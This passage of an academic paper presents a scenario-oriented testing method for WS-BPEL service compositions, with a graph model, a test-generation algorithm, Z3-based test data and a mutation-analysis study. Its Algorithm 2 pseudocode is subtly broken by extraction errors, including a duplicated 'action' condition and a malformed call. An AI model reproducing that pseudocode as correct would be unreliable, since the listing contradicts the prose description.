are threefold: (i) We propose a scenario-oriented testing framework for WS-BPEL service compositions, including a graph model for WS-BPEL specifications, a set of mapping rules and an algorithm for converting WS-BPEL specifications to the graph model, an algorithm for generating test scenarios with respect to a specific criterion, and a constraint-based technique of test data generation; (ii) We develop a tool to automate the proposed scenario-oriented testing framework and algorithms; and (iii) We validate the feasibility of the proposed approach and evaluate its fault-detection effectiveness via an empirical study. The rest of the paper is organized as follows. Section 2 introduces underlying concepts related to WS-BPEL, scenario-oriented testing, and constraint solving techniques. Section 3 proposes the scenario-oriented testing approach for WS-BPEL service compositions. Section 4 describes the prototype tool developed by us. Section 5 describes an empirical study where the proposed approach is used to test two real-life WS-BPEL service compositions. The experimental results are discussed in Section 6. Section 7 discusses related work. Section 8 concludes the paper and proposes the future work. 2 BACKGROUND In this section, we introduce underlying concepts and techniques of the proposed approach. 2.1 Business Process Execution Language for Web Services (WS-BPEL) For a service-based system, a bundle of Web services need to be coordinated and each service is expected to execute the predefined functionalities. For such coordination, there are two representative ways, namely orchestration and choreography [22]. Among them, orchestration is more widely recognized and adopted in practice. WS-BPEL is an executable service composition language which specifies business processes by orchestrating Web services, and exports the process as a composite Web service described by the Web Service Description Language (WSDL [34]). In this way, individual WS-BPEL process can be used as a basic service unit to participate in the more complex business processes. A WS-BPEL process often consists of four sections, namely partner link statements, variable statements, handler statements, and interaction steps. Activities are basic interaction units of WS-BPEL processes, and are further divided into basic activities and structural activities. Basic activities execute an atomic execution step, including assign, invoke, receive, reply, throw, wait, empty, and so on. Structural activities are composites of basic activities and/or structural activities, including sequence, switch, while, flow, pick, and so on. WS-BPEL has standard control structures, such as sequence, switch, and while. In addition, WS-BPEL provides concurrency among activities via flow activities and synchronization via link tags within flows. Each link has a source activity and a target activity. A transition condition, which is an XPath Boolean expression, can be associated with some links. A transition can happen only when the associated conditions are satisfied, that is, executing the target activity after completion of the source activity. If transition conditions are not explicitly specified, their default values are true, indicating that target activity will always be performed after executing the source activity. If an activity is the target activity of multiple links, the activity should have an associated join condition, and only when all the incoming links are defined and its join condition is true, can the activity be enabled. Otherwise, if the join condition is false, the activity is not executed and the effect is propagated downstream to the subsequent activities. Through the flow and link structure, WS-BPEL provides a “multiple-choice” style workflow pattern [32], and multiple outgoing flows may be enabled simultaneously representing concurrent behaviors. 2.2 Scenario-oriented testing From the workflow point of view, the functionalities of a system can be described as a set of scenarios. A scenario usually represents an execution path of a software system. In this sense, one needs to first derive a set of possible test scenarios and then execute these scenarios with test data and observe their behaviors. Test data associated with a specific test scenario can be derived by analyzing and solving the conditions along the associated path. If an execution of scenarios does not happen as expected, then a fault is detected. WS-BPEL provides the mechanism to specify concurrent behaviors in workflows. This feature gives rise to new challenges when testing those service compositions with concurrency behavior. First, concurrency behaviors are nondeterministic and thus difficult to be repeated. Secondly, the concurrency mechanism introduces nonstructural elements, which are more difficult to be tested than common control flows. Finally, comprehensive testing of concurrent behaviors significantly increases the number of possible test scenarios. To decide to what extent concurrent elements should be tested, Sun [26] has proposed three coverage criteria as follows: Weak concurrency coverage. Test scenarios are derived to cover only one feasible sequence of parallel processes, without considering the interleaving of activities between parallel processes. Moderate concurrency coverage. Test scenarios are derived to cover all the feasible sequences of parallel processes, without considering the interleaving of activities between parallel processes. Strong concurrency coverage. Test scenarios are derived to cover all feasible sequences of activities and parallel processes. Although these test coverage criteria were first proposed for concurrency testing in general, they are applicable to testing concurrent behaviors in WS-BPEL programs. All these test coverage criteria require covering each activity in parallel at least once. Among them, weak coverage and moderate coverage criteria require the parallel activities to be tested in a sequential way, while strong coverage criterion which considers all possible combinations of activities and transitions is therefore impractical due to its huge costs. 2.3 Constraint solving techniques Constraint solving techniques can enable applications such as extended static checking, predicate abstraction, test case generation and bounded model checking [7]. Especially, constraint solving plays an important role in test case generation for the purpose of coverage or a particular type of property verification, such as bug finding and vulnerability detection [41]. Furthermore, constraint solver-based testing tools enable more precise analysis with the ability to generate bug-revealing inputs. For the past decade, researchers developed a variety of constraint solvers [18]. Among them, Z3 [7] is one of the most powerful constraint solvers with features of supporting linear real and integer arithmetic, fixed-size bit-vector, uninterpreted functions, extensional arrays, quantifiers, multiple input formats, and extensive APIs (including C/C++/.NET/Java/Python APIs). Z3-str [41] is an extension of Z3 supporting combined logics over strings and non-string operations. It supports three sorts of logic: (i) string-sorted terms include string constants and variables of arbitrary length; (ii) integer-sorted terms are standard, with the exception of the length function over string terms; (iii) Boolean operators are used to combine atomic formulas which are equations over string terms and equalities or inequalities over integer terms. In this paper, we leverage advances in constraint solvers and use Z3 and Z3-str as constraint solver to generate the relevant input values of a path condition, which is to be discussed later. 3 Scenario-Oriented Testing for WS-BPEL Service Compositions The proposed scenario-oriented testing approach for WS-BPEL service compositions is sketched in Figure 1. In the context of WS-BPEL specifications, a test scenario corresponds to a set of activities and transitions. The number of test scenarios may be very huge when service compositions are complex. One key issue is how to generate a set of test scenarios according to a certain coverage criteria. Furthermore, WS-BPEL service compositions may be subject to frequent changes in order to cater for quickly changed business requirements and dynamic environments. It may be very tedious and difficult to generate test scenarios manually, especially for large and complex WS-BPEL compositions. Therefore, the scenario-oriented testing for service compositions should be automated as much as possible. In this section, we elaborate the main steps of our approach and show how the above mentioned issues are addressed when applying the approach to WS-BPEL programs. 3.1 WS-BPEL Graph Model (BGM) WS-BPEL programs are represented as XML files, which are greatly different in syntax from those programs written in traditional programming languages, such as C or Java. On the other hand, WS-BPEL programs are well structured and hence can be easily analyzed by means of available XML analysis techniques, such as Document Object Model (DOM) [33] and Simple API for XML (SAX) [24]. When we generate test scenarios from WS-BPEL programs, only those elements defined in the interaction section make sense, and thus we can skip over those elements defined in partner links variables and handler sections. Furthermore, we can also skip over those attributes of an activity that make no contributions to the construction of test scenarios. To make the testing task simple and effective, we first define an abstract test model called WS-BPEL Graph Model (BGM), which only considers activities and their relationships within WS-BPEL specifications. The objective of BGM is two-fold. First, one can use it to convert a complex WS-BPEL program into a simple graph, which is formal and easy for analysis. Second, it abstracts activities with the similar semantics as a type of node, thus reducing the quantity of control structure types. For example, both the switch and pick types are used to specify the optional control logic, and they should share the same notations in BGM. The BGM of a WS-BPEL program is an extended graph \[ \text{BGM} = \langle \text{Nodes}, \text{Edges} \rangle. \] A node in \(\text{Nodes}\) corresponds to a WS-BPEL activity and is represented as an entry \[ < \text{id}, \text{responseid}, \text{outing}, \text{type}, \text{name} >, \] where - \(\text{id}\) is the unique identification of an activity. It starts from zero and each activity inside optional or parallel activities are labeled in a depth-first way. 1. In this paper, we use WS-BPEL compositions and WS-BPEL programs interchangeably. A <table> <thead> <tr> <th>Node type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>initial</td> <td>The beginning of interactions</td> </tr> <tr> <td>end</td> <td>The end of interactions</td> </tr> <tr> <td>action</td> <td>A normal activity</td> </tr> <tr> <td>branch</td> <td>The beginning of an optional activity</td> </tr> <tr> <td>merge</td> <td>The end of an optional activity</td> </tr> <tr> <td>fork</td> <td>The beginning of parallel activities</td> </tr> <tr> <td>join</td> <td>The end of parallel activities</td> </tr> <tr> <td>cycle</td> <td>A loop activity</td> </tr> </tbody> </table> - **outing** refers to the number of subsequent activities of the current activity. - **type** refers to the type of the current activity. Node types in BGM are summarized in Table 1. - **name** refers to the name of the current activity. - **responseid** is used to identify the hierarchy of WS-BPEL activities. The definitions of different node type’s **responseid** are further explained as follows. - **responseid** of an **action** or **initial** node denotes the next non-normal node; - **responseid** of a **branch** node denotes its matching **merge** node; - **responseid** of a **fork** node denotes its matching **join** node; - **responseid** of a **merge** node or **join** node denotes its next node after the **merge** or **join** node, respectively; - **responseid** of an **end** node denotes itself; - **responseid** of a **cycle** node denotes itself. An edge in **Edges** corresponds to a transition in WS-BPEL and is represented as an entry \(< iID, oID >\), where - **iID** refers to the **ID** of the incoming activity of the transition; - **oID** refers to the **ID** of the outgoing activity of the transition. ### 3.2 Conversion of WS-BPEL program into BGM We first classify activities of WS-BPEL specifications into five types. Among them, normal activities are the basic activity, while others are structural activities. - **Normal** activities refer to an atomic execution unit. - **Sequential** activities refer to that their child activities are executed in the sequential order, such as the **sequence** and **scope** activity. - **Optional** activities refer to that only one branch of their child activities can be executed, such as the **switch**, **if/else if/else**, **pick** activity. - **Loop** activities refer to that their child activities are executed all the time until some conditions are satisfied. - **Parallel** activities refer to that their child activities are executed simultaneously, such as the **flow** activity. In order to convert WS-BPEL specifications into BGMs, we define a set of mapping rules with respect to each type of WS-BPEL activities, as follows. - For the **normal** activities, they are directly mapped to action nodes. - For the **sequential** activities, a sequence of nodes are created and each node corresponds to a child activity; meanwhile, an edge is added between each pair of nodes. - For the **optional** activities, they are mapped to **branch-merge** node pairs, and each branch is mapped to a child node. - For the **loop** activities, their child activities are mapped to a sequence of nodes, and a **cycle** node is added in the end whose outgoing edges are towards the first node in the loop and the first node after the loop. - For the **parallel** activities, they are used to support concurrency with flows in WS-BPEL. For those activities without source or target activities, they are executed in parallel. In this context, the \(< \text{flow}<\text{/flow}>\) pairs are mapped to **fork-join** node pairs, and each parallel branch is mapped to a child node of **fork** and the father node of **join**. For those child activities that have the source and target elements within the flows, transitions are enabled depending on whether the link’s conditions are satisfied. ![Fig. 2. Illustration of mapping rules](image-url) Figure 2 illustrates these mapping rules. Note that for the structural activities (sequential, optional, loop, and parallel), their child activities can be either basic or structural activities. The mapping rules discussed above can be applied recursively. Based on these mapping rules, we propose a recursive conversion algorithm (Algorithm 1), which can be used to automatically convert a WS-BPEL program into a BGM. The proposed algorithm first gets the number of top activities of the current WS-BPEL program, and then converts each activity according to its type. The conversions are conducted following the above-mentioned mapping rules. The algorithm is able to convert complex and nested structural activities. Its time complexity is proportional to... generate test scenarios with respect to the given coverage criterion. As an illustration, we proposed Algorithm 2 to generate test scenarios from BGM with respect to the weak concurrency coverage discussed in Section 2.2. Algorithm 2 WeakCoverage(Node start, Node end) generating test scenarios from BGM (G) with respect to weak concurrency coverage 1: if start ≠ end then 2: if start.type = “action” then 3: tmpPaths ← WeakCoverage(start.afterNodes, get(0), end) 4: end if 5: Add start node to each path in tmpPaths 6: return tmpPaths 7: if start.type = “action” or start.type = “action” then 8: node ← getResponseNode(start.responseid) 9: for all i = 1, 2, ..., start.afterNodes.size() do 10: tmp[i] ← WeakCoverage(start.afterNodes.get(i), node) 11: end for 12: tmpPaths ← WeakCoverage(start.afterNodes.get(0), end) 13: merge tmp[] and tmpPaths into resultPaths 14: return resultPaths 15: end if 16: if start.type = “cycle” then 17: startNode ← the first node in the loop 18: endDate ← the last node in the loop 19: tmpPaths1 ← WeakCoverage(startNode, endDate) 20: tmpNode ← the first node after the loop 21: tmpPaths2 ← WeakCoverage(tmpNode, end) 22: Merge tmpPaths1 and tmpPaths2 into resultPaths 23: return resultPaths 24: end if 25: else 26: Add start node to resultPaths 27: return resultPaths 28: end if The algorithm generates test scenarios from a start node to an end node recursively. In the first round, the start node corresponds to the initial node and the end node corresponds to the end node of a BGM. After that, a start node and an end node form a segment of BGM, and partial test scenarios are generated according to the types of nodes: - If the start node is a branch node or a fork node, the BGM segment is divided into two parts. One is from the start node (namely branch or fork node) to the corresponding response node (namely merge or join node) that can be specified by means of its responseid; the other is from the first node next to the corresponding response node to the end node. The algorithm generates partial test scenario for each part and then combines them to form the complete test scenario. 3.3 Generation of test scenarios based on BGM The abstract BGM provides a formal test model on the basis of which we can easily define algorithms to automatically Fig. 3. The resulting BGM for the SupplyChain service composition • If the start node is a cycle node, the BGM segment is also divided into two parts. One is from the first node in loop to the last node in loop; the other is from the first node after loop to the end node. The algorithm generates partial test scenario for each part and combines them to form the complete test scenario. • If the start node is the end node, it means that all nodes have been handled, and the start node is added to the generated test scenarios. The proposed algorithm traverses all nodes once, so its time complexity is proportional to the number of nodes, that is, $O(n)$ where $n$ denotes the number of nodes in BGM. When the algorithm is applied to BGM shown in Fig. 3, two test scenarios are generated: (i) ‘initial’→‘receiveInput’→‘warehouse’→‘branch’→‘Shipper’→‘Assign’→‘Merge’→‘reply’→‘end’; and (ii) ‘initial’→‘receiveInput’→‘warehouse’→‘branch’→‘Assign’→‘Merge’→‘reply’→‘end’. 3.4 Constraint-based test case generation Scenario-oriented testing is actually a path sensitive testing approach that traverses program paths in a depth-first way. For each program path, a set of constraints on the program's inputs is generated. The conjunction of those constraints is called a path condition, which is used to avoid infeasible paths. The constraints are of various kinds: constraint satisfaction problems (e.g. "A or B is true"), simplex algorithm (e.g. "$x \leq 5"$), and others. Typically, there are three methods for generating test data for a specific program path [40], namely (i) symbolic execution is a method of analyzing a program to determine what inputs cause each part of a program to execute; this method assumes symbolic values for inputs rather than concrete inputs as normal execution of the program would; (ii) genetic algorithm searches the possible inputs by means of heuristic that mimics the process of natural selection, such as inheritance, mutation, selection, and crossover; and (iii) constraint solving. Among these methods, symbolic execution is a static approach and mainly suitable for solving linear paths, while genetic algorithm is a dynamic approach requiring the execution of a program multiple times and hence very time-consuming. Based on the above observations, we employ constraint solving to generate test data for a specific program path, and particularly select Z3 [6] as constrain solver. The process of constraint-based test case generation is illustrated in Figure 4. Firstly, the path conditions are identified for each test scenario. Secondly, test data are generated according to the path conditions via constraint solver. Finally, test suites are constructed based on the test data. The details how to automate each step are given in the following. • Identification of path conditions: To identify the path condition of a specific test scenario, we need to extract constraints that have to be satisfied in order to run the scenario. In the context of WS-BPEL, branch statements (such as “switch”, “if”, “elseif”, and “else”) and cycle statements (such as “while”, “repeatUntil” and “forEach”) are supported; all conditions of branch or cycle nodes on the path are extracted and combined to form an expression of the path conditions. Since WS-BPEL programs are represented as well-structured XML files, the extraction of node’s information required in BGM is eased via XML DOM. If the condition part of a branch or cycle node in the test scenario is not empty, it will be added to the path condition. • Generation of test data: As mentioned before, a WS-BPEL program is implemented as a composite Web service. The WS-BPEL program is commonly described by a WSDL file, which clearly declares the signature of operations supported by the Web service. Thus, one can know its input requirements by analyzing WS-BPEL programs. It is tedious and time-consuming to manually generate test data that satisfy the path conditions. In this study, we turn to constraint solver Z3 to automatically generate test data according to the expressions of path conditions. To do that, we first convert the path condition expression into variables that Z3 can accept. During this step, we also simplify the expression to remove redundant or irrelevant variables. Next, we set the value range of each input variables by the analysis of WS-BPEL programs. Finally, Z3 solver is executed to obtain concrete values within the range. Test data are then constructed by composing the concrete values of all variables in the expression. • Construction of test suite: A test case consists of test scenario and its associated test data. Since test data can be generated for each test scenario, a complete test suite can be constructed by generating test data for all test scenarios of the WS-BPEL program. 4 Prototype Tool We have developed a prototype tool to automate all the steps of test case generation in the proposed approach. It has the following main features: (i) Automatic generation of a set of test scenarios with respect to a coverage criterion; (ii) Automatic generation of a scenario-oriented test suite whose size is adjustable. Furthermore, it provides an integrated test execution and verification mechanism for WS-BPEL programs: it aids the execution of the WS-BPEL program with generated test cases and the verification of each tests by comparing actual outputs with expected ones. The tool was developed using Java and its implementation consists of about 3500 lines of codes. Figure 5 depicts the architecture of the tool. The tool consists of three main components, namely Test Scenario Generation, Test Data Generation, and Execution and Verification. Inside Test Scenario Generation, BPEL Parser is responsible for parsing WS-BPEL programs; Converter converts WS-BPEL programs into BGMs implementing the mapping rules in Section 3.2; Scenario Generator implements the algorithms of generating test scenarios with respect to the given concurrency coverage criteria. Inside Test Data Generation, WSDL Parser is responsible for parsing the WS-BPEL programs; Path Analyzer is responsible for constructing of path conditions of test scenarios; Data Generator is responsible for generating test data based on path conditions which can drive the execution of the given test scenarios, and its implementation is based on the integration of Z3. Inside Execution and Verification, Proxy is responsible for executing tests using test suite, and is implemented by integrating ActiveBPEL, a well recognized WS-BPEL engine [1]; Verifier is responsible for verifying test results with expected outputs and producing a test report. Note that the prototype was developed based on the general WS-BPEL standard and thus is not restricted to specific WS-BPEL systems. To equip the prototype with a good adaptability, an interface was reserved to further integrate Apache ODE [2], an open source WS-BPEL engine. More details on the tool is available in [40]. This prototype tool was used in the experiments that evaluate the fault-detection effectiveness of the proposed approach, which is going to be described next. ![Diagram of the prototype tool](image-url) **Fig. 5. The architecture of the prototype tool** ### 5 Empirical Study In this section, we reported on an empirical study where two real-life WS-BPEL programs are used as subject programs, mutation analysis was applied to quantitatively measure the fault-detection effectiveness, and the tool mentioned above was used to aid the experiments. #### 5.1 Research Questions In this study, we attempt to answer the following questions. - **RQ1**: Is the proposed scenario-oriented approach applicable to WS-BPEL programs? In this study, we selected two real-life representative WS-BPEL programs as subject programs, and used the proposed approach and prototype tool to test these two programs. - **RQ2**: How effective is the proposed scenario-oriented approach in detecting faults in WS-BPEL programs? The fault-detection effectiveness is a major metric for evaluating a testing method. Normally, the more faults a testing method can detect, the more effective it is. In this study, we evaluate the fault-detection effectiveness of the scenario-oriented approach via mutation analysis [8]. - **RQ3**: Is the proposed approach better than random testing? In this study, we compare the fault-detection effectiveness of the proposed approach with that of random testing, which is widely adopted in practice. ### 5.2 Subject programs SupplyChain [5] is a WS-BPEL process in the management system of supply chain. Figure 6 illustrates its flowchart labeled with the statement identifiers. It receives three input messages from customers, which are NameProduct, AmountProduct, and WarehouseResponse. Customer sends Retailer the booking request, based on which Retailer sends Warehouse the supply request. Warehouse will response to Retailer according to the stock. After receiving the response, Retailer will react as follows: If Warehouse replies “yes” (that is, the stock is enough), Retailer will send shipping request to Shipper, who will then confirm by sending “yes” to Retailer; if Warehouse replies “no” (that is, the stock is not enough), Retailer will send the Customer the message “Warehouse cannot receive the bill” and cancel the booking. The WS-BPEL service composition for SupplyChain is relatively simple, involving three Web services. ![Diagram of the SupplyChain process](image-url) **Fig. 6. The BPEL flowchart of the SupplyChain process** SmartShelf [17] receives an input message called commodity, which is composed of three fields, namely name, amount, and status. The process returns an output message which is composed of quantity, location, and status. Figure 7 illustrates its flowchart labeled with the statement identifiers. After receiving the input message, the process compares it with available shelf items and decides whether the amount, location and status of the available items meet the expected requirements. If the amount of available goods on shelf is larger than the amount of commodity, the quantity of message is “Quantity is enough”; otherwise, it transfers goods from warehouse. If the amount of available goods in warehouse is larger than the amount of commodity, the quantity of message is “Quantity is not enough”. If the name of commodity is not the same as the name of available goods on shelf, it rearranges the goods and returns “Rearrange is done” as the location of message; otherwise it returns “Location is OK”. If the status of commodity is larger than the available status of shelf, it sends status to warehouse and returns “Status is fine now” as status of message; otherwise, it returns “Status is ok”. The above comparisons are done in parallel. The WS-BPEL service composition for SmartShelf is complex and involves the interactions among 14 Web services. It behaves as a typical concurrent program and hence is very representative. 5.3 Mutant generation Mutation analysis [8] is widely used to assess the adequacy of a test suite and the effectiveness of testing techniques. It applies some mutation operators to seed various faults into the program under test, in order to generate a set of variants, namely mutants. If a test case causes a mutant to show a behavior different from the program under test, the mutant is said to be “killed”. In this study, we employ mutation analysis to validate the effectiveness of our approach. Though a set of mutation operators was proposed WS-BPEL service compositions [9], [11], [12], only five types of mutation operators are applicable and thus were selected in our experiments: ERR refers to “replacing a relational operator by another of the same type”, AIE refers to “removing an else if element or an else element of an activity”, ACI refers to “changing the value of the createInstance attribute from ‘yes’ to ‘no’”, ASF refers to “replacing a sequence activity by a flow activity”, and ASI refers to “exchanging the order of two sequence child activities”. In this study, we manually seeded faults into the WS-BPEL programs, because there was no practical tool for this purpose when we started this work. For SupplyChain, we have generated totally 11 mutants; while 26 mutants were generated for SmartShelf. These mutants are summarized in Appendix A. Note that among the 26 mutants for SmartShelf, the mutant #22 is equivalent to the basic program (that is, it always shows the same behavior as the base program), and thus is excluded from the experiment. 5.4 Variables and measures 5.4.1 Independent variables The independent variables in our experiment are the test case generation techniques. A natural choice for the variable is our scenario-oriented test case generation technique for WS-BPEL service compositions, as described in Section 3. In addition, we used a random testing method as the baseline technique for comparison. In the random testing method, the input parameters are first identified for each program; next, a value range is defined for each input parameter; a concrete value is then randomly generated from the corresponding value range according to the uniform distribution; finally, a test case is constructed by combining the random values. 5.4.2 Dependent variables We employ two metrics, namely mutation score (MS) and fault discovery rate (FDR), to measure the effectiveness of our approach. MS is defined as $$\text{MS}(p, TS) = \frac{N_k}{N_m - N_e},$$ where $p$ refers to the program under test, $TS$ refers to the test suite used for testing the mutants, $N_k$ refers to the number of mutants killed by $TS$, $N_m$ refers to the total number of generated mutants, and $N_e$ refers to the number of equivalent mutants. MS intuitively indicates the capability of a test suite killing mutants. The larger the MS is, the more effective a test suite is in killing mutants for the given program. FDR is defined as $$\text{FDR}(m, TS) = \frac{N_f}{N_{TS}},$$ where $m$ refers to a certain mutant, $TS$ refers to the test suite, $N_f$ refers to the number of test cases that can kill $m$, and $N_{TS}$ refers to the total number of test cases in $TS$. Intuitively speaking, FDR indicates how effective a test suite is in killing a certain mutant. The larger the FDR is, the more effective a test suite is to kill the given mutant. 5.5 Experiment Environment The experiments were conducted in the environment of MS Windows 7 with 64-bits, a dual processor of 2.30 GHz, and 2 GB memory. All Web services were implemented in Java language. WS-BPEL programs were developed using Eclipse 4.3.0 and deployed on Apache Tomcat 5.5.33. The prototype tool is based on Z3 4.3.0 for Windows 64 bits and ActiveBPEL 5.0.2. 5.6 Test case generation and data collection In the experiments, each testing strategy (either our scenario-oriented technique or the random generation method) was used to generate four different test suites for each object program. In the test suites, each test scenario was associated with five, ten, twenty, and fifty test cases. In total, SmartShelf and SupplyChain have 12 and 2 test scenarios, respectively. Therefore, the four test suites for SmartShelf will have contain 60, 120, 240, and 600 test cases, respectively; while the suites for SupplyChain contains 10, 20, 40, and 100 test cases, respectively. In the rest of the paper, we will use TS-60, TS-120, TS-240, TS-600 to represent the test suites for SmartShelf, while TS-10, TS-20, TS-40, TS-100 for SupplyChain. All test cases were used to test each mutant (except Mutant #22 of SmartShelf, which is an equivalent mutant). The output of the mutant will be compared with that of the 1939-1374 (c) 2015 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. base program, which, in this study, was regarded as a test oracle. The testing result (“pass” or “fail”) will be recorded to the later calculation of FDR and MS. 5.7 Threats to Validity The threat to internal validity mainly relates to the implementations of the two testing techniques (our scenario-oriented technique and the random testing method) under this study. The programming work was conducted by several individuals, and was examined by different personnel. We are confident that the testing techniques were correctly implemented. The threat to external validity is concerned with the selection of object programs. Though only two WS-BPEL service compositions were used in our experiment, they show consistent results (as observed in the next Section 6). Having said that, we cannot say that the similar results will be exhibited on other service compositions. The threat to construct validity is in the measurements used in this study. Mutation score has been popularly used in the context of mutation analysis for measuring the fault-detection effectiveness of many testing techniques. The other metric, fault discovery rate, is also natural and straightforward to reflect how effective a test suite is in detecting a certain fault. The most obvious threat to conclusion validity is that we only have a limited number of experimental data. For each subject program, tens of mutants were constructed. For each testing technique, four test suites were generated. Though all the experimental results are consistent, we cannot guarantee that our conclusion is applicable in a more general sense. 6 Experimental Results In this section, we report on the experimental results and answer the research questions posed in Section 5.1. 6.1 Results on SupplyChain The values of FDR on the 11 mutants of SupplyChain are summarized in Figure 8 (Original experimental data are available in Appendix B). From Figure 8, we can observe that the test suite generated by our approach show different fault-detection effectiveness on different mutants. The effectiveness is also varying with different suite sizes. Such observations are intuitively expected as in the context of software testing; there does not exist a “golden” test suite that is effective in detecting any type of fault. For the fault types ACI, ASF, and ASI, our approach has fairly consistent performance on different suite sizes. However, on the fault types ERR and AIE, we have observed that the effectiveness shows a large variation. In other words, it is relatively uncertain how effective our approach is to detect these two types of faults. Thus, it is recommended that one should pay much attention to ERR and AIE when designing and testing WS-BPEL programs. In addition, our scenario-oriented technique outperforms random testing for some mutants, while random testing performs better for other mutants. However, we can still observe that FDR of the scenario-oriented technique has lower variation than that of random testing. In other words, our scenario-oriented technique is more reliable than random testing method. With regard to MS, all four test suites generated by the scenario-oriented technique achieve an MS of 100%, that is, they can kill all the mutants. On contrary, random testing only has an MS of 90.9% (all four random test suites cannot kill the mutant M3). Generally speaking, our scenario-oriented technique is more effective than random testing in detecting various faults. 6.2 Results on SmartShelf The values of FDR on the 25 mutants of SmartShelf are summarized in Figure 9 (Original experimental data are available in Appendix B). Our observation based on Figure 9 is similar to those for SupplyChain: The fault-detection effectiveness varies with different mutants, different test suite sizes, and different testing techniques. Our approach delivers consistent effectiveness on the fault types ACI, ASF, and ASI. Nevertheless, the performance of our approach on the fault types ERR and AIE also shows a large variation, which implies that our approach is not steady on these types of faults, and thus much attention should be paid on them in testing. Moreover, the scenario-oriented technique is a more reliable method than random testing. 6.3 Answers to Research Questions Based on the above experimental results and observations, we now answer the research questions: 1) Answer to RQ1 (Applicability): The proposed approach has been successfully employed to test two real-life WS-BPEL programs. Most steps of the proposed approach in the experiments have been automatically by the prototype tool. The proposed approach and prototype tool significantly reduce testing efforts, but also make it possible on-the-fly and on demand testing of WS-BPEL programs. 2) Answer to RQ2 (Fault-detection effectiveness): From the experimental results, the proposed scenario-oriented technique shows an MS of 100%, which indicates that generated test suites can detect all seeded faults for both WS-BPEL programs; and the proposed technique also shows a high FDR for most cases, which means that generated test suite is very sensitive to detect faults in WS-BPEL programs. Furthermore, our approach becomes more efficient with the aid of the tool. 3) Answer to RQ3 (Fault-detection effectiveness comparison): The experimental results show that our approach and random testing have a comparable FDR, while the former has a higher mutation score. In addition, the smaller variation of FDR than random testing implies that our approach is a more reliable test technique for WS-BPEL programs. 7 RELATED WORK WS-BPEL provides a mechanism to build flexible business processes by assembling loosely coupled Web services. Adequately and effectively testing WS-BPEL service composi- tions is necessary when they are used to execute mission-critical business processes. Some efforts have been reported to test service compositions \[3, 23\]. We next describe several closely related studies on testing WS-BPEL service compositions. WS-BPEL service compositions are a kind of concurrent programs with SOA features. To test such concurrent programs, people usually turn to the reachability analysis \[31\]. Fanjul et al. \[15, 16\] proposed a model-based approach to testing WS-BPEL processes. In their approach, SPIN is employed as a model to generate the test suite for WS-BPEL programs. A transition coverage criterion is employed to select test cases. Since the approach needs to model all possible states of WS-BPEL specifications, it encounters the state space explosion problem when service compositions are complex and thus has limits in practice. Estero-Botaro et al. \[10\] proposed a test case generation framework for WS-BPEL programs. Their framework is based on a genetic algorithm which generates test suites for mutation testing. To maximize the mutation score of a test suite, the proposed genetic algorithm needs to execute WS-BPEL programs under test many times, which is very time-consuming and thus not efficient. Unlike their approach, our approach uses the adequacy criteria based on the structure of WS-BPEL programs and constraint solving techniques. Yuan et al. \[37\] proposed a graph-search based test case generation method for WS-BPEL programs. In their approach, an extended control flow graph (ECFG) is defined to represent WS-BPEL programs, and then traverse the ECFG model to generate concurrent test paths. Test data are generated using a constraint solving method. A XML schema is employed to represent test cases, which are abstract and thus not executable. No experiments are reported on the effectiveness of their approach. Similarly, Yan et al. \[36\] proposed an extended control flow graph (XCFG) to represent WS-BPEL programs, and sequential test paths are generated from XCFG. A constraint solver is employed to construct test cases for the generated paths. A case study is reported where 14 sequential paths and 57 combined paths are generated. Only 9 paths are feasible. For the above approaches, experimental results in terms of fault detection capability are missing. Our approach is similar to the two approaches in that both our approach and the above approaches consider test case generation by means of control flows of WS-BPEL programs. Unlike the above approaches, our approach can generate executable test cases on demand and the fault detection capability of our approach is also reported by applying it to two real-life WS-BPEL programs. Ni et al. \[20\] recently presented an approach to generating message sequences for testing WS-BPEL programs. Their approach first models the WS-BPEL program under test as a message-sequence graph (MSG), then generates message sequences based on MSG, and finally generates test cases based on MSG. Experiments were performed with six small WS-BPEL programs and the fault-detection effectiveness of their approach was compared with the other techniques. Our approach and their approach explore test case generation for WS-BPEL programs from different directions: The former does this from test scenarios, while the latter from message sequences. On the other hand, both test scenarios and message sequences actually represent a logic path of BPEL programs. Finally, it is not clear to what extent test case generation in their approach can be automated; our approach has been fully automated with the aid of the prototype tool. This is particularly desired for the on-the-fly testing of BPEL programs. Zhang et al. \[38\] proposed a model-based approach to generating test cases for WS-BPEL programs. The approach transforms Web service flows into UML 2.0 activity diagrams and then generates test cases from the activity diagram. The approach is very close to our previous work \[26, 30, 39\], in which we proposed a model-based approach to automatically generating a set of test scenarios for UML activity diagram programs. Unlike the above approaches which generate abstract test cases from a formal or semiformal representation, our approach presented in this paper generates directly executable test cases and supports different concurrency coverage criteria when generating test scenarios. Furthermore, we developed a prototype tool to automate the proposed approach and conducted case studies on two realistic WS-BPEL programs to show the effectiveness of generated test scenarios and test suite. 8 CONCLUSION AND FUTURE WORK In this paper, we present a scenario-oriented testing approach to address the challenges related to ensuring the quality of WS-BPEL service compositions. This approach first converts WS-BPEL programs into an abstract test model, and test scenarios are then automatically generated from the model with respect to some coverage criteria. For the derived test scenarios, test suites can be obtained automatically. We developed a tool to automate our approach, and an empirical study was conducted to demonstrate how the approach can be applied to real-life service compositions. Experimental results validate the feasibility and effectiveness of the approach. Using our approach and the prototype, testers can effectively test WS-BPEL service compositions. In the context of SOA, service compositions may face frequent changes, and concrete services are likely to be bound at runtime. Our approach nicely cater for the requirements for testing SOA software in that (1) it supports on demand testing on WS-BPEL service compositions, (2) it saves test efforts significantly through automatic generations of test cases, (3) it can be adapted to the run-time binding because it supports on-the-fly tests. In this sense, our approach does address the challenges caused by the unique features of SOA software. In our current work, we have achieved the full automation of test case generation, which is a significant improvement from the preliminary study \[28\]. In the future work, we will investigate how to automate the process of test result verification. Metamorphic testing \[19\] is a promising approach in this field, and we have conducted some studies on applying this approach into the testing of Web services \[29\]. It is worthwhile to combine the current work with these previous studies, with the purpose of automating the whole testing procedure for service compositions. It should be noted that our approach is not restricted to the specific platform. WS-BPEL was designed as a platform-independent language, which make it possible for different organizations to interconnect their services. Though only two subject programs were used in our empirical study, it does not necessarily imply that our approach is only applicable to them. Having said that, larger-scale empirical studies on different platforms are still required to reinforce the applicability and effectiveness of our approach. In the future, we will include more different subject programs, and evaluate our approach on the mutants that are automatically (instead of manually) generated by some tools [13]. Moreover, it will be interesting to investigate whether and how our approach can be adjusted and extended to test other types of services (such as big data services) and service compositions (such as mashups). Since the main components of our approach, namely, scenario-oriented testing, Z3 constraint solver, etc., are general techniques rather than specific to 